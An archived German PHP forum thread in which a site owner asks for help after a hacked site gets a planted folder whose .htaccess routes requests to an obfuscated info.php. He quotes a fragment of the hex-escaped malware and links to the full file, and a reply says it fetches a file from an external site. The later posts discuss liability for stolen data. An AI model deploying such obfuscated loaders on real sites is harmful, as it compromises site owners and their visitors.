php-resource




Archiv verlassen und diese Seite im Standarddesign anzeigen :
Site gehackt -> Bitte um Rat


 
danibert
04-01-2014, 09:22 
 
Hallo zusammen,

gestern wurde meine Website gehackt, und ein Ordner namens "media" darauf abgelegt. Im Ordner befinden sich eine .htaccess Datei, welche alle Aufrufe auf die Datei info.php umleitet. Mein Webhoster hat mir vorsorglich gleich den Account gesperrt.

Die info.php habe ich mir angeschaut, werde aber überhaupt nicht schlau, was hier passiert. So sieht der Inhalt aus (hier nur ein Teil):
<?php ${"\x47\x4cO\x42\x41\x4c\x53"}["\x6a\x62\x74\x76cvf"]="\x69\x70\x73";${"\x47LO\x42\x41\x4cS"}["\x68c\x7a\x6dyc\x63\x71a"]="\x69p";${"\x47\x4cO\x42\x41\x4cS"}["\x78fx\x66c\x64"]="\x75r\x69";${"\x47L\x4fB\x41L\x53"}["\x79\x73f\x79\x66\x6f"]="fu\x6ec";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6b\x68\x76f\x72ulz\x72"]="\x68\x65ade\x72\x73";$... und so weiter. Die komplette Datei habe ich hier hochgeladen: cshare.de - Download info.php (http://www.cshare.de/file/46dac5a80140b3b3d3b953bed2c46dad/info.php.html)

Wenn ich die Datei lokal ausführe, erhalte ich nur eine leere Seite.
Könnt Ihr mir sagen, was die Datei macht?

Danke für alle Tipps

 
h3ll
04-01-2014, 11:48 
 
Könnt Ihr mir sagen, was die Datei macht?

Sie lädt eine Datei von einer externen Seite und sendet sie an den Browser.

 
Thromervair
20-05-2014, 12:36 
 
Hast du schon herausgefunden wo die Lücke ist? Das sie nicht noch mal kommen können wenn du alles wieder bereinigt hast.

 
DominikHaus
04-11-2014, 14:21 
 
Eine Frage. Wer haftet bei solchen Hacks, wenn Daten geklaut werden?

 
Berni
04-11-2014, 14:45 
 
Das kann man so pauschal nicht beantworten.
Wenn du grob fahrlässig mit den Daten umgegangen bist, dann wohl du.

 
faster
08-01-2015, 18:03 
 
Sonst der Hoster oder wie?

 
Berni
09-01-2015, 14:28 
 
nö, warum auch!


Alle Zeitangaben in WEZ +2. Es ist jetzt 05:22 Uhr.